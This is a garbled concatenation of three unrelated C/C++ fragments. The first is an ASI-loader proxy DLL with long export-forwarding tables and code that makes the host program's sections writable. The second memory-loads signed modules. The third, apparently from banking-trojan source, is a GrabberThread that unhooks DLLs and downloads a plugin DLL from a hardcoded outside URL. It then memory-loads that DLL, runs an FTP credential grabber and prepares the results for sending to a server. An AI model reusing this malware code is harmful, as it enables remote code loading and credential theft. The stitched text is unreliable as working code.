"D3DKMTLock"); d3d11.D3DKMTOpenAdapterFromHdc = GetProcAddress(d3d11.dll, "D3DKMTOpenAdapterFromHdc"); d3d11.D3DKMTOpenResource = GetProcAddress(d3d11.dll, "D3DKMTOpenResource"); d3d11.D3DKMTPresent = GetProcAddress(d3d11.dll, "D3DKMTPresent"); d3d11.D3DKMTQueryAdapterInfo = GetProcAddress(d3d11.dll, "D3DKMTQueryAdapterInfo"); d3d11.D3DKMTQueryAllocationResidency = GetProcAddress(d3d11.dll, "D3DKMTQueryAllocationResidency"); d3d11.D3DKMTQueryResourceInfo = GetProcAddress(d3d11.dll, "D3DKMTQueryResourceInfo"); d3d11.D3DKMTRender = GetProcAddress(d3d11.dll, "D3DKMTRender"); d3d11.D3DKMTSetAllocationPriority = GetProcAddress(d3d11.dll, "D3DKMTSetAllocationPriority"); d3d11.D3DKMTSetContextSchedulingPriority = GetProcAddress(d3d11.dll, "D3DKMTSetContextSchedulingPriority"); d3d11.D3DKMTSetDisplayMode = GetProcAddress(d3d11.dll, "D3DKMTSetDisplayMode"); d3d11.D3DKMTSetDisplayPrivateDriverFormat = GetProcAddress(d3d11.dll, "D3DKMTSetDisplayPrivateDriverFormat"); d3d11.D3DKMTSetGammaRamp = GetProcAddress(d3d11.dll, "D3DKMTSetGammaRamp"); d3d11.D3DKMTSetVidPnSourceOwner = GetProcAddress(d3d11.dll, "D3DKMTSetVidPnSourceOwner"); d3d11.D3DKMTSignalSynchronizationObject = GetProcAddress(d3d11.dll, "D3DKMTSignalSynchronizationObject"); d3d11.D3DKMTUnlock = GetProcAddress(d3d11.dll, "D3DKMTUnlock"); d3d11.D3DKMTWaitForSynchronizationObject = GetProcAddress(d3d11.dll, "D3DKMTWaitForSynchronizationObject"); d3d11.D3DKMTWaitForVerticalBlankEvent = GetProcAddress(d3d11.dll, "D3DKMTWaitForVerticalBlankEvent"); d3d11.D3DPerformance_BeginEvent = GetProcAddress(d3d11.dll, "D3DPerformance_BeginEvent"); d3d11.D3DPerformance_EndEvent = GetProcAddress(d3d11.dll, "D3DPerformance_EndEvent"); d3d11.D3DPerformance_GetStatus = GetProcAddress(d3d11.dll, "D3DPerformance_GetStatus"); d3d11.D3DPerformance_SetMarker = GetProcAddress(d3d11.dll, "D3DPerformance_SetMarker"); d3d11.EnableFeatureLevelUpgrade = GetProcAddress(d3d11.dll, "EnableFeatureLevelUpgrade"); d3d11.OpenAdapter10 = GetProcAddress(d3d11.dll, "OpenAdapter10"); d3d11.OpenAdapter10_2 = GetProcAddress(d3d11.dll, "OpenAdapter10_2"); } else { if (_stricmp(DllName + 1, "winmmbase.dll") == NULL) { winmmbase.dll = LoadLibrary(szSystemPath); winmmbase.CloseDriver = GetProcAddress(winmmbase.dll, "CloseDriver"); winmmbase.DefDriverProc = GetProcAddress(winmmbase.dll, "DefDriverProc"); winmmbase.DriverCallback = GetProcAddress(winmmbase.dll, "DriverCallback"); winmmbase.DrvGetModuleHandle = GetProcAddress(winmmbase.dll, "DrvGetModuleHandle"); winmmbase.GetDriverModuleHandle = GetProcAddress(winmmbase.dll, "GetDriverModuleHandle"); winmmbase.OpenDriver = GetProcAddress(winmmbase.dll, "OpenDriver"); winmmbase.SendDriverMessage = GetProcAddress(winmmbase.dll, "SendDriverMessage"); winmmbase.auxGetDevCapsA = GetProcAddress(winmmbase.dll, "auxGetDevCapsA"); winmmbase.auxGetDevCapsW = GetProcAddress(winmmbase.dll, "auxGetDevCapsW"); winmmbase.auxGetNumDevs = GetProcAddress(winmmbase.dll, "auxGetNumDevs"); winmmbase.auxGetVolume = GetProcAddress(winmmbase.dll, "auxGetVolume"); winmmbase.auxOutMessage = GetProcAddress(winmmbase.dll, "auxOutMessage"); winmmbase.auxSetVolume = GetProcAddress(winmmbase.dll, "auxSetVolume"); winmmbase.joyConfigChanged = GetProcAddress(winmmbase.dll, "joyConfigChanged"); winmmbase.joyGetDevCapsA = GetProcAddress(winmmbase.dll, "joyGetDevCapsA"); winmmbase.joyGetDevCapsW = GetProcAddress(winmmbase.dll, "joyGetDevCapsW"); winmmbase.joyGetNumDevs = GetProcAddress(winmmbase.dll, "joyGetNumDevs"); winmmbase.joyGetPos = GetProcAddress(winmmbase.dll, "joyGetPos"); winmmbase.joyGetPosEx = GetProcAddress(winmmbase.dll, "joyGetPosEx"); winmmbase.joyGetThreshold = GetProcAddress(winmmbase.dll, "joyGetThreshold"); winmmbase.joyReleaseCapture = GetProcAddress(winmmbase.dll, "joyReleaseCapture"); winmmbase.joySetCapture = GetProcAddress(winmmbase.dll, "joySetCapture"); winmmbase.joySetThreshold = GetProcAddress(winmmbase.dll, "joySetThreshold"); winmmbase.midiConnect = GetProcAddress(winmmbase.dll, "midiConnect"); winmmbase.midiDisconnect = GetProcAddress(winmmbase.dll, "midiDisconnect"); winmmbase.midiInAddBuffer = GetProcAddress(winmmbase.dll, "midiInAddBuffer"); winmmbase.midiInClose = GetProcAddress(winmmbase.dll, "midiInClose"); winmmbase.midiInGetDevCapsA = GetProcAddress(winmmbase.dll, "midiInGetDevCapsA"); winmmbase.midiInGetDevCapsW = GetProcAddress(winmmbase.dll, "midiInGetDevCapsW"); winmmbase.midiInGetErrorTextA = GetProcAddress(winmmbase.dll, "midiInGetErrorTextA"); winmmbase.midiInGetErrorTextW = GetProcAddress(winmmbase.dll, "midiInGetErrorTextW"); winmmbase.midiInGetID = GetProcAddress(winmmbase.dll, "midiInGetID"); winmmbase.midiInGetNumDevs = GetProcAddress(winmmbase.dll, "midiInGetNumDevs"); winmmbase.midiInMessage = GetProcAddress(winmmbase.dll, "midiInMessage"); winmmbase.midiInOpen = GetProcAddress(winmmbase.dll, "midiInOpen"); winmmbase.midiInPrepareHeader = GetProcAddress(winmmbase.dll, "midiInPrepareHeader"); winmmbase.midiInReset = GetProcAddress(winmmbase.dll, "midiInReset"); winmmbase.midiInStart = GetProcAddress(winmmbase.dll, "midiInStart"); winmmbase.midiInStop = GetProcAddress(winmmbase.dll, "midiInStop"); winmmbase.midiInUnprepareHeader = GetProcAddress(winmmbase.dll, "midiInUnprepareHeader"); winmmbase.midiOutCacheDrumPatches = GetProcAddress(winmmbase.dll, "midiOutCacheDrumPatches"); winmmbase.midiOutCachePatches = GetProcAddress(winmmbase.dll, "midiOutCachePatches"); winmmbase.midiOutClose = GetProcAddress(winmmbase.dll, "midiOutClose"); winmmbase.midiOutGetDevCapsA = GetProcAddress(winmmbase.dll, "midiOutGetDevCapsA"); winmmbase.midiOutGetDevCapsW = GetProcAddress(winmmbase.dll, "midiOutGetDevCapsW"); winmmbase.midiOutGetErrorTextA = GetProcAddress(winmmbase.dll, "midiOutGetErrorTextA"); winmmbase.midiOutGetErrorTextW = GetProcAddress(winmmbase.dll, "midiOutGetErrorTextW"); winmmbase.midiOutGetID = GetProcAddress(winmmbase.dll, "midiOutGetID"); winmmbase.midiOutGetNumDevs = GetProcAddress(winmmbase.dll, "midiOutGetNumDevs"); winmmbase.midiOutGetVolume = GetProcAddress(winmmbase.dll, "midiOutGetVolume"); winmmbase.midiOutLongMsg = GetProcAddress(winmmbase.dll, "midiOutLongMsg"); winmmbase.midiOutMessage = GetProcAddress(winmmbase.dll, "midiOutMessage"); winmmbase.midiOutOpen = GetProcAddress(winmmbase.dll, "midiOutOpen"); winmmbase.midiOutPrepareHeader = GetProcAddress(winmmbase.dll, "midiOutPrepareHeader"); winmmbase.midiOutReset = GetProcAddress(winmmbase.dll, "midiOutReset"); winmmbase.midiOutSetVolume = GetProcAddress(winmmbase.dll, "midiOutSetVolume"); winmmbase.midiOutShortMsg = GetProcAddress(winmmbase.dll, "midiOutShortMsg"); winmmbase.midiOutUnprepareHeader = GetProcAddress(winmmbase.dll, "midiOutUnprepareHeader"); winmmbase.midiStreamClose = GetProcAddress(winmmbase.dll, "midiStreamClose"); winmmbase.midiStreamOpen = GetProcAddress(winmmbase.dll, "midiStreamOpen"); winmmbase.midiStreamOut = GetProcAddress(winmmbase.dll, "midiStreamOut"); winmmbase.midiStreamPause = GetProcAddress(winmmbase.dll, "midiStreamPause"); winmmbase.midiStreamPosition = GetProcAddress(winmmbase.dll, "midiStreamPosition"); winmmbase.midiStreamProperty = GetProcAddress(winmmbase.dll, "midiStreamProperty"); winmmbase.midiStreamRestart = GetProcAddress(winmmbase.dll, "midiStreamRestart"); winmmbase.midiStreamStop = GetProcAddress(winmmbase.dll, "midiStreamStop"); winmmbase.mixerClose = GetProcAddress(winmmbase.dll, "mixerClose"); winmmbase.mixerGetControlDetailsA = GetProcAddress(winmmbase.dll, "mixerGetControlDetailsA"); winmmbase.mixerGetControlDetailsW = GetProcAddress(winmmbase.dll, "mixerGetControlDetailsW"); winmmbase.mixerGetDevCapsA = GetProcAddress(winmmbase.dll, "mixerGetDevCapsA"); winmmbase.mixerGetDevCapsW = GetProcAddress(winmmbase.dll, "mixerGetDevCapsW"); winmmbase.mixerGetID = GetProcAddress(winmmbase.dll, "mixerGetID"); winmmbase.mixerGetLineControlsA = GetProcAddress(winmmbase.dll, "mixerGetLineControlsA"); winmmbase.mixerGetLineControlsW = GetProcAddress(winmmbase.dll, "mixerGetLineControlsW"); winmmbase.mixerGetLineInfoA = GetProcAddress(winmmbase.dll, "mixerGetLineInfoA"); winmmbase.mixerGetLineInfoW = GetProcAddress(winmmbase.dll, "mixerGetLineInfoW"); winmmbase.mixerGetNumDevs = GetProcAddress(winmmbase.dll, "mixerGetNumDevs"); winmmbase.mixerMessage = GetProcAddress(winmmbase.dll, "mixerMessage"); winmmbase.mixerOpen = GetProcAddress(winmmbase.dll, "mixerOpen"); winmmbase.mixerSetControlDetails = GetProcAddress(winmmbase.dll, "mixerSetControlDetails"); winmmbase.mmDrvInstall = GetProcAddress(winmmbase.dll, "mmDrvInstall"); winmmbase.mmGetCurrentTask = GetProcAddress(winmmbase.dll, "mmGetCurrentTask"); winmmbase.mmTaskBlock = GetProcAddress(winmmbase.dll, "mmTaskBlock"); winmmbase.mmTaskCreate = GetProcAddress(winmmbase.dll, "mmTaskCreate"); winmmbase.mmTaskSignal = GetProcAddress(winmmbase.dll, "mmTaskSignal"); winmmbase.mmTaskYield = GetProcAddress(winmmbase.dll, "mmTaskYield"); winmmbase.mmioAdvance = GetProcAddress(winmmbase.dll, "mmioAdvance"); winmmbase.mmioAscend = GetProcAddress(winmmbase.dll, "mmioAscend"); winmmbase.mmioClose = GetProcAddress(winmmbase.dll, "mmioClose"); winmmbase.mmioCreateChunk = GetProcAddress(winmmbase.dll, "mmioCreateChunk"); winmmbase.mmioDescend = GetProcAddress(winmmbase.dll, "mmioDescend"); winmmbase.mmioFlush = GetProcAddress(winmmbase.dll, "mmioFlush"); winmmbase.mmioGetInfo = GetProcAddress(winmmbase.dll, "mmioGetInfo"); winmmbase.mmioInstallIOProcA = GetProcAddress(winmmbase.dll, "mmioInstallIOProcA"); winmmbase.mmioInstallIOProcW = GetProcAddress(winmmbase.dll, "mmioInstallIOProcW"); winmmbase.mmioOpenA = GetProcAddress(winmmbase.dll, "mmioOpenA"); winmmbase.mmioOpenW = GetProcAddress(winmmbase.dll, "mmioOpenW"); winmmbase.mmioRead = GetProcAddress(winmmbase.dll, "mmioRead"); winmmbase.mmioRenameA = GetProcAddress(winmmbase.dll, "mmioRenameA"); winmmbase.mmioRenameW = GetProcAddress(winmmbase.dll, "mmioRenameW"); winmmbase.mmioSeek = GetProcAddress(winmmbase.dll, "mmioSeek"); winmmbase.mmioSendMessage = GetProcAddress(winmmbase.dll, "mmioSendMessage"); winmmbase.mmioSetBuffer = GetProcAddress(winmmbase.dll, "mmioSetBuffer"); winmmbase.mmioSetInfo = GetProcAddress(winmmbase.dll, "mmioSetInfo"); winmmbase.mmioStringToFOURCCA = GetProcAddress(winmmbase.dll, "mmioStringToFOURCCA"); winmmbase.mmioStringToFOURCCW = GetProcAddress(winmmbase.dll, "mmioStringToFOURCCW"); winmmbase.mmioWrite = GetProcAddress(winmmbase.dll, "mmioWrite"); winmmbase.sndOpenSound = GetProcAddress(winmmbase.dll, "sndOpenSound"); winmmbase.waveInAddBuffer = GetProcAddress(winmmbase.dll, "waveInAddBuffer"); winmmbase.waveInClose = GetProcAddress(winmmbase.dll, "waveInClose"); winmmbase.waveInGetDevCapsA = GetProcAddress(winmmbase.dll, "waveInGetDevCapsA"); winmmbase.waveInGetDevCapsW = GetProcAddress(winmmbase.dll, "waveInGetDevCapsW"); winmmbase.waveInGetErrorTextA = GetProcAddress(winmmbase.dll, "waveInGetErrorTextA"); winmmbase.waveInGetErrorTextW = GetProcAddress(winmmbase.dll, "waveInGetErrorTextW"); winmmbase.waveInGetID = GetProcAddress(winmmbase.dll, "waveInGetID"); winmmbase.waveInGetNumDevs = GetProcAddress(winmmbase.dll, "waveInGetNumDevs"); winmmbase.waveInGetPosition = GetProcAddress(winmmbase.dll, "waveInGetPosition"); winmmbase.waveInMessage = GetProcAddress(winmmbase.dll, "waveInMessage"); winmmbase.waveInOpen = GetProcAddress(winmmbase.dll, "waveInOpen"); winmmbase.waveInPrepareHeader = GetProcAddress(winmmbase.dll, "waveInPrepareHeader"); winmmbase.waveInReset = GetProcAddress(winmmbase.dll, "waveInReset"); winmmbase.waveInStart = GetProcAddress(winmmbase.dll, "waveInStart"); winmmbase.waveInStop = GetProcAddress(winmmbase.dll, "waveInStop"); winmmbase.waveInUnprepareHeader = GetProcAddress(winmmbase.dll, "waveInUnprepareHeader"); winmmbase.waveOutBreakLoop = GetProcAddress(winmmbase.dll, "waveOutBreakLoop"); winmmbase.waveOutClose = GetProcAddress(winmmbase.dll, "waveOutClose"); winmmbase.waveOutGetDevCapsA = GetProcAddress(winmmbase.dll, "waveOutGetDevCapsA"); winmmbase.waveOutGetDevCapsW = GetProcAddress(winmmbase.dll, "waveOutGetDevCapsW"); winmmbase.waveOutGetErrorTextA = GetProcAddress(winmmbase.dll, "waveOutGetErrorTextA"); winmmbase.waveOutGetErrorTextW = GetProcAddress(winmmbase.dll, "waveOutGetErrorTextW"); winmmbase.waveOutGetID = GetProcAddress(winmmbase.dll, "waveOutGetID"); winmmbase.waveOutGetNumDevs = GetProcAddress(winmmbase.dll, "waveOutGetNumDevs"); winmmbase.waveOutGetPitch = GetProcAddress(winmmbase.dll, "waveOutGetPitch"); winmmbase.waveOutGetPlaybackRate = GetProcAddress(winmmbase.dll, "waveOutGetPlaybackRate"); winmmbase.waveOutGetPosition = GetProcAddress(winmmbase.dll, "waveOutGetPosition"); winmmbase.waveOutGetVolume = GetProcAddress(winmmbase.dll, "waveOutGetVolume"); winmmbase.waveOutMessage = GetProcAddress(winmmbase.dll, "waveOutMessage"); winmmbase.waveOutOpen = GetProcAddress(winmmbase.dll, "waveOutOpen"); winmmbase.waveOutPause = GetProcAddress(winmmbase.dll, "waveOutPause"); winmmbase.waveOutPrepareHeader = GetProcAddress(winmmbase.dll, "waveOutPrepareHeader"); winmmbase.waveOutReset = GetProcAddress(winmmbase.dll, "waveOutReset"); winmmbase.waveOutRestart = GetProcAddress(winmmbase.dll, "waveOutRestart"); winmmbase.waveOutSetPitch = GetProcAddress(winmmbase.dll, "waveOutSetPitch"); winmmbase.waveOutSetPlaybackRate = GetProcAddress(winmmbase.dll, "waveOutSetPlaybackRate"); winmmbase.waveOutSetVolume = GetProcAddress(winmmbase.dll, "waveOutSetVolume"); winmmbase.waveOutUnprepareHeader = GetProcAddress(winmmbase.dll, "waveOutUnprepareHeader"); winmmbase.waveOutWrite = GetProcAddress(winmmbase.dll, "waveOutWrite"); winmmbase.winmmbaseFreeMMEHandles = GetProcAddress(winmmbase.dll, "winmmbaseFreeMMEHandles"); winmmbase.winmmbaseGetWOWHandle = GetProcAddress(winmmbase.dll, "winmmbaseGetWOWHandle"); winmmbase.winmmbaseHandle32FromHandle16 = GetProcAddress(winmmbase.dll, "winmmbaseHandle32FromHandle16"); winmmbase.winmmbaseSetWOWHandle = GetProcAddress(winmmbase.dll, "winmmbaseSetWOWHandle"); } else { if (_stricmp(DllName + 1, "msacm32.dll") == NULL) { msacm32.dll = LoadLibrary(szSystemPath); msacm32.acmDriverAddA = GetProcAddress(msacm32.dll, "acmDriverAddA"); msacm32.acmDriverAddW = GetProcAddress(msacm32.dll, "acmDriverAddW"); msacm32.acmDriverClose = GetProcAddress(msacm32.dll, "acmDriverClose"); msacm32.acmDriverDetailsA = GetProcAddress(msacm32.dll, "acmDriverDetailsA"); msacm32.acmDriverDetailsW = GetProcAddress(msacm32.dll, "acmDriverDetailsW"); msacm32.acmDriverEnum = GetProcAddress(msacm32.dll, "acmDriverEnum"); msacm32.acmDriverID = GetProcAddress(msacm32.dll, "acmDriverID"); msacm32.acmDriverMessage = GetProcAddress(msacm32.dll, "acmDriverMessage"); msacm32.acmDriverOpen = GetProcAddress(msacm32.dll, "acmDriverOpen"); msacm32.acmDriverPriority = GetProcAddress(msacm32.dll, "acmDriverPriority"); msacm32.acmDriverRemove = GetProcAddress(msacm32.dll, "acmDriverRemove"); msacm32.acmFilterChooseA = GetProcAddress(msacm32.dll, "acmFilterChooseA"); msacm32.acmFilterChooseW = GetProcAddress(msacm32.dll, "acmFilterChooseW"); msacm32.acmFilterDetailsA = GetProcAddress(msacm32.dll, "acmFilterDetailsA"); msacm32.acmFilterDetailsW = GetProcAddress(msacm32.dll, "acmFilterDetailsW"); msacm32.acmFilterEnumA = GetProcAddress(msacm32.dll, "acmFilterEnumA"); msacm32.acmFilterEnumW = GetProcAddress(msacm32.dll, "acmFilterEnumW"); msacm32.acmFilterTagDetailsA = GetProcAddress(msacm32.dll, "acmFilterTagDetailsA"); msacm32.acmFilterTagDetailsW = GetProcAddress(msacm32.dll, "acmFilterTagDetailsW"); msacm32.acmFilterTagEnumA = GetProcAddress(msacm32.dll, "acmFilterTagEnumA"); msacm32.acmFilterTagEnumW = GetProcAddress(msacm32.dll, "acmFilterTagEnumW"); msacm32.acmFormatChooseA = GetProcAddress(msacm32.dll, "acmFormatChooseA"); msacm32.acmFormatChooseW = GetProcAddress(msacm32.dll, "acmFormatChooseW"); msacm32.acmFormatDetailsA = GetProcAddress(msacm32.dll, "acmFormatDetailsA"); msacm32.acmFormatDetailsW = GetProcAddress(msacm32.dll, "acmFormatDetailsW"); msacm32.acmFormatEnumA = GetProcAddress(msacm32.dll, "acmFormatEnumA"); msacm32.acmFormatEnumW = GetProcAddress(msacm32.dll, "acmFormatEnumW"); msacm32.acmFormatSuggest = GetProcAddress(msacm32.dll, "acmFormatSuggest"); msacm32.acmFormatTagDetailsA = GetProcAddress(msacm32.dll, "acmFormatTagDetailsA"); msacm32.acmFormatTagDetailsW = GetProcAddress(msacm32.dll, "acmFormatTagDetailsW"); msacm32.acmFormatTagEnumA = GetProcAddress(msacm32.dll, "acmFormatTagEnumA"); msacm32.acmFormatTagEnumW = GetProcAddress(msacm32.dll, "acmFormatTagEnumW"); msacm32.acmGetVersion = GetProcAddress(msacm32.dll, "acmGetVersion"); msacm32.acmMetrics = GetProcAddress(msacm32.dll, "acmMetrics"); msacm32.acmStreamClose = GetProcAddress(msacm32.dll, "acmStreamClose"); msacm32.acmStreamConvert = GetProcAddress(msacm32.dll, "acmStreamConvert"); msacm32.acmStreamMessage = GetProcAddress(msacm32.dll, "acmStreamMessage"); msacm32.acmStreamOpen = GetProcAddress(msacm32.dll, "acmStreamOpen"); msacm32.acmStreamPrepareHeader = GetProcAddress(msacm32.dll, "acmStreamPrepareHeader"); msacm32.acmStreamReset = GetProcAddress(msacm32.dll, "acmStreamReset"); msacm32.acmStreamSize = GetProcAddress(msacm32.dll, "acmStreamSize"); msacm32.acmStreamUnprepareHeader = GetProcAddress(msacm32.dll, "acmStreamUnprepareHeader"); } else { if (_stricmp(DllName + 1, "xlive.dll") == NULL) { // Unprotect image - make .text and .rdata section writeable // get load address of the exe DWORD dwLoadOffset = (DWORD)GetModuleHandle(NULL); BYTE * pImageBase = reinterpret_cast<BYTE *>(dwLoadOffset); PIMAGE_DOS_HEADER pDosHeader = reinterpret_cast<PIMAGE_DOS_HEADER> (dwLoadOffset); PIMAGE_NT_HEADERS pNtHeader = reinterpret_cast<PIMAGE_NT_HEADERS> (pImageBase + pDosHeader->e_lfanew); PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pNtHeader); for (int iSection = 0; iSection < pNtHeader->FileHeader.NumberOfSections; ++iSection, ++pSection) { char * pszSectionName = reinterpret_cast<char *>(pSection->Name); if (!strcmp(pszSectionName, ".text") || !strcmp(pszSectionName, ".rdata")) { DWORD dwPhysSize = (pSection->Misc.VirtualSize + 4095) & ~4095; DWORD oldProtect; DWORD newProtect = (pSection->Characteristics & IMAGE_SCN_MEM_EXECUTE) ? PAGE_EXECUTE_READWRITE : PAGE_READWRITE; if (!VirtualProtect(reinterpret_cast <VOID *>(dwLoadOffset + pSection->VirtualAddress), dwPhysSize, newProtect, &oldProtect)) { ExitProcess(0); } } } } else { MessageBox(0, "This library isn't supported. Try to rename it to d3d8.dll, d3d9.dll, d3d11.dll, winmmbase.dll, msacm32.dll, dinput8.dll, dsound.dll, vorbisFile.dll, xlive.dll or ddraw.dll.", "ASI Loader", MB_ICONERROR); ExitProcess(0); } } } } } } } } } } }
RPRIVATE_TESTABLE RBOOL loadModule ( rpHCPContext* hcpContext, rSequence seq ) { RBOOL isSuccess = FALSE; RU32 moduleIndex = (RU32)(-1); RPU8 tmpBuff = NULL; RU32 tmpSize = 0; RPU8 tmpSig = NULL; RU32 tmpSigSize = 0; rpal_thread_func pEntry = NULL; rpHCPModuleContext* modContext = NULL; OBFUSCATIONLIB_DECLARE( entryName, RP_HCP_CONFIG_MODULE_ENTRY ); OBFUSCATIONLIB_DECLARE( recvMessage, RP_HCP_CONFIG_MODULE_RECV_MESSAGE ); if( NULL != seq && NULL != hcpContext ) { for( moduleIndex = 0; moduleIndex < RP_HCP_CONTEXT_MAX_MODULES; moduleIndex++ ) { if( 0 == hcpContext->modules[ moduleIndex ].hThread ) { // Found an empty spot break; } } } if( RP_HCP_CONTEXT_MAX_MODULES != moduleIndex && (RU32)(-1) != moduleIndex ) { // We got an empty spot for our module if( rSequence_getRU8( seq, RP_TAGS_HCP_MODULE_ID, &(hcpContext->modules[ moduleIndex ].id ) ) && rSequence_getBUFFER( seq, RP_TAGS_BINARY, &tmpBuff, &tmpSize ) && rSequence_getBUFFER( seq, RP_TAGS_SIGNATURE, &tmpSig, &tmpSigSize ) && CRYPTOLIB_SIGNATURE_SIZE == tmpSigSize ) { // We got the data, now verify the buffer signature if( CryptoLib_verify( tmpBuff, tmpSize, getRootPublicKey(), tmpSig ) ) { // Ready to load the module rpal_debug_info( "loading module in memory" ); hcpContext->modules[ moduleIndex ].hModule = MemoryLoadLibrary( tmpBuff, tmpSize ); if( NULL != hcpContext->modules[ moduleIndex ].hModule ) { OBFUSCATIONLIB_TOGGLE( entryName ); pEntry = (rpal_thread_func)MemoryGetProcAddress( hcpContext->modules[ moduleIndex ].hModule, (RPCHAR)entryName ); OBFUSCATIONLIB_TOGGLE( entryName ); if( NULL != pEntry ) { modContext = &(hcpContext->modules[ moduleIndex ].context); modContext->pCurrentId = &( hcpContext->currentId ); modContext->func_sendHome = doSend; modContext->isTimeToStop = rEvent_create( TRUE ); modContext->rpalContext = rpal_Context_get(); modContext->isOnlineEvent = hcpContext->isCloudOnline; if( NULL != modContext->isTimeToStop ) { hcpContext->modules[ moduleIndex ].isTimeToStop = modContext->isTimeToStop; OBFUSCATIONLIB_TOGGLE( recvMessage ); hcpContext->modules[ moduleIndex ].func_recvMessage = (rpHCPModuleMsgEntry)MemoryGetProcAddress( hcpContext->modules[ moduleIndex ].hModule, (RPCHAR)recvMessage ); OBFUSCATIONLIB_TOGGLE( recvMessage ); hcpContext->modules[ moduleIndex ].hThread = rpal_thread_new( pEntry, modContext ); if( 0 != hcpContext->modules[ moduleIndex ].hThread ) { CryptoLib_hash( tmpBuff, tmpSize, &(hcpContext->modules[ moduleIndex ].hash ) ); hcpContext->modules[ moduleIndex ].isOsLoaded = FALSE; isSuccess = TRUE; } else { rpal_debug_warning( "Error creating handler thread for new module." ); } } } else { rpal_debug_warning( "Could not find new module's entry point." ); } } else { rpal_debug_warning( "Error loading module in memory." ); } } else { rpal_debug_warning( "New module signature invalid." ); } } else { rpal_debug_warning( "Could not find core module components to load." ); } // Main cleanup if( !isSuccess ) { if( NULL != modContext ) { IF_VALID_DO( modContext->isTimeToStop, rEvent_free ); } if( NULL != hcpContext->modules[ moduleIndex ].hModule ) { MemoryFreeLibrary( hcpContext->modules[ moduleIndex ].hModule ); } rpal_memory_zero( &(hcpContext->modules[ moduleIndex ] ), sizeof( hcpContext->modules[ moduleIndex ] ) ); } } else { rpal_debug_error( "Could not find a spot for new module, or invalid module id!" ); } return isSuccess; }
DWORD WINAPI GrabberThread( LPVOID lpData ) { UnhookDlls(); /* char GrabberFile[] = {'X',':','\\', 't','r','a','s','h','\\','c','o','d','e','\\','w','o','r','k','\\' ,'r','f','b','\\','b','r','a','n','c','h','e','s','\\','d','l','l','\\','b','i','n','\\','D','e','b','u','g','\\','x','8','6','.','d','l','l',0}; ///if ( BotModule != NULL ) { typedef void ( WINAPI *PVNC_Start )(); HANDLE hFile=CreateFile(GrabberFile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0); DWORD dwSize=GetFileSize(hFile,0); LPVOID BotModule = MemAlloc(dwSize); pReadFile(hFile,BotModule,dwSize,&dwSize,0); pCloseHandle(hFile); HMEMORYMODULE hLib = MemoryLoadLibrary( BotModule ); if ( hLib == NULL ) { return 0; } PVNC_Start VNC_Start = (PVNC_Start)MemoryGetProcAddress( hLib, "_VNC_Start@0" ); ///PVNC_Start VNC_Start = (PVNC_Start)GetProcAddress(LoadLibrary(GrabberFile),"_VNC_Start@0"); VNC_Start(); while (true) pSleep(1); MemoryFreeLibrary( hLib ); MemFree( BotModule ); return 1; } */ //link.txt // char GrabberFile[] = {"http://apartman-adriana.com/temp/DrClient.dll"/*'/','g','r','a','b','e','r','.','d','l','l',0*/}; LPVOID BotModule = NULL; bool bKnock = false; while ( ( BotModule = DownloadPluginFromPath(GrabberFile, NULL ) ) == NULL ) { pSleep( 1000 * 60 * 5 ); } if ( BotModule != NULL ) { HMEMORYMODULE hLib = MemoryLoadLibrary( BotModule ); if ( hLib == NULL ) { return 0; } typedef char * ( WINAPI *PFTPGRAB )(); char GrabFTP[] = {'S','c','a','n','1', 0 }; char Ole32[] = {'o','l','e','3','2','.','d','l','l', 0}; typedef void ( WINAPI *PCoUninitialize )(); typedef HRESULT ( WINAPI *PCoInitialize )( LPVOID lpReserved ); PCoUninitialize pCoUninitialize_ = (PCoUninitialize)GetProcAddressEx( Ole32, 0, 0xEDB3159D ); PCoInitialize pCoInitialize_ = (PCoInitialize)GetProcAddressEx( Ole32, 0, 0xF341D5CF ); pCoUninitialize_(); pCoInitialize_( NULL ); PFTPGRAB FtpGrabber = (PFTPGRAB)MemoryGetProcAddress( hLib, GrabFTP ); char *Buffer = FtpGrabber(); DWORD dwSize = m_lstrlen( Buffer ); if ( dwSize != 0 ) { Buffer[ dwSize ] = '\0'; bool Sended = false; do { // Отправляем данные на сервер Sended = true; if (!Sended) pSleep( 1000 ); } while (!Sended); } MemoryFreeLibrary( hLib ); MemFree( Buffer ); MemFree( BotModule ); }